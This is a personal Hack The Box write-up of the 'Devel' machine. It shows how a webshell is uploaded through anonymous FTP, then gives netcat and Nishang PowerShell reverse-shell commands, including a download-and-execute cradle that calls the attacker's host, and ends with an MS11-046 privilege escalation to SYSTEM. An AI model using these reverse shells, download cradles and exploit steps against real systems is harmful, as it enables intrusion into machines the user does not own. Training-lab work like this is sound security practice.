HTB: Devel

Devel

Following on from Blue in number of pwns is Devel. I’m going in blind.

Ports

Just FTP and HTTP on this one. The detail scan says anonymous FTP is allowed and the webserver is Microsoft IIS httpd 7.5.

Shell

We can login to FTP and put files. I’m far - far - from expert at Windows, but I copy the included aspx webshell from the default Kali installation and upload it. With this I can run commands in the browser; but I’m a low privileged user:

iis apppool\web

I upload winpeas.bat but I’m not entirely sure where to go next. I go get the Windows Exploit Suggester - Next Generation and clone it and run it against the output of systeminfo on the box. Which shows, amongst other things:

OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600

The WES script says:

Installed hotfixes: None

And it comes up with 236 potential vulnerabilities. Wew lad.

Writeups

Even though there are apparently myriad opportunities for moving forward, it’s not clear to me what the best thing to do is. I consult a thorough writeup from 0xdf.

Next step

0xdf shows a method for copying files to the Windows host using netcat. It’s not entirely necessary in this case since we can just use the FTP upload but it’s good practice. We use a python SMB server:

python3 /usr/share/doc/python3-impacket/examples/smbserver.py share smb

We need the compiled nc binary to copy to the box:

cp /usr/share/windows-resources/binaries/nc.exe .

We need a listener:

nc -lnvp 443

And we send this to the webshell:

\\10.10.14.2\share\nc.exe -e cmd.exe 10.10.14.2 443

And … nothing. Actually that’s not true; I can see it is transferring the file over the SMB server but it’s not triggering the reverse shell.

I check some other resources, kill my sambaserver and try again:

python3 /usr/share/doc/python3-impacket/examples/smbserver.py ROPNOP ./

Now I can run this on the webshell:

dir \\10.10.14.2\ROPNOP

And I can see my files. Let’s try this on the webshell:

\\10.10.14.2\ROPNOP\nc.exe -e cmd.exe 10.10.14.2 443

Success!

┌──(root💀kali)-[/opt/htb/devel]
└─# nc -nvlp 443    
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.5] 49164
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>

From here:

Executing files from SMB. Because of the way Windows treats UNC paths, it’s possible to just execute our binary directly from the SMB share without even needing to copy it over first. Just run the executable as if it were already local and the payload will fire.

Ok, next.

Alternative via Nishang

0xdf recommends Nishang. I clone the repo to /opt/nishang. We copy one of the shells to our local directory:

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .

We have to edit the file, by copying the example line from it to the bottom of the script and editing the host and port:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 443

So the shell definition is in the body of the script, and the call is the line we added. Next, we kill our nc shell (we don’t actually use it) and restart the listener, start a python server and send this call to the webshell:

powershell iex(new-object net.webclient).downloadstring('http://10.10.14.2/Invoke-PowerShellTcp.p

We’ll see these things:

┌──(root💀kali)-[/opt/htb/devel]
└─# python3 -m http.server 80                                                                                                      
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.5 - - [06/Mar/2021 03:22:01] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -

and

┌──(root💀kali)-[/opt/htb/devel]
└─# nc -nvlp 443                                                                                                                                                                                                   1 ⨯
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.5] 49167
Windows PowerShell running as user DEVEL$ on DEVEL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>

Okay, now we have a powershell reverse shell instead.

0xdf also shows a meterpreter reverse shell but I’ll ignore that for now.

Privesc

0xdf runs a different vulnerability scanner called Watson, which shows some potential privesc methods. I’m not sure how he chose which one to use, but it’s MS11-046 using a precompiled binary from here.

I copy it over like he does, and try to run it with the nc shell (powershell version won’t run it apparently) and it … doesn’t work. I get this message:

Program too big to fit in memory

Googling this error message mostly shows people rebooting or whatever; I won’t be doing that. Now what?

There is source code for an exploit for MS11-046 in searchsploit. We need to mirror it and compile it, but first we need to install mingw-w64. Here’s an excerpt from my history showing the relevant commands:

2096  searchsploit -m windows_x86/local/40564.c
2099  apt install mingw-w64
2102  mv 40564.c MS11-046.c
2103  i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32

And it’s bing, bang, rama-a-lama ding dong!

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web

c:\windows\system32\inetsrv>\\10.10.14.2\ROPNOP\MS11-046.exe
\\10.10.14.2\ROPNOP\MS11-046.exe

c:\Windows\System32>whoami
whoami
nt authority\system

Next is OpenAdmin, but I’ve already done that one when it was live. I’ll move onto Netmon, which I’ve never done.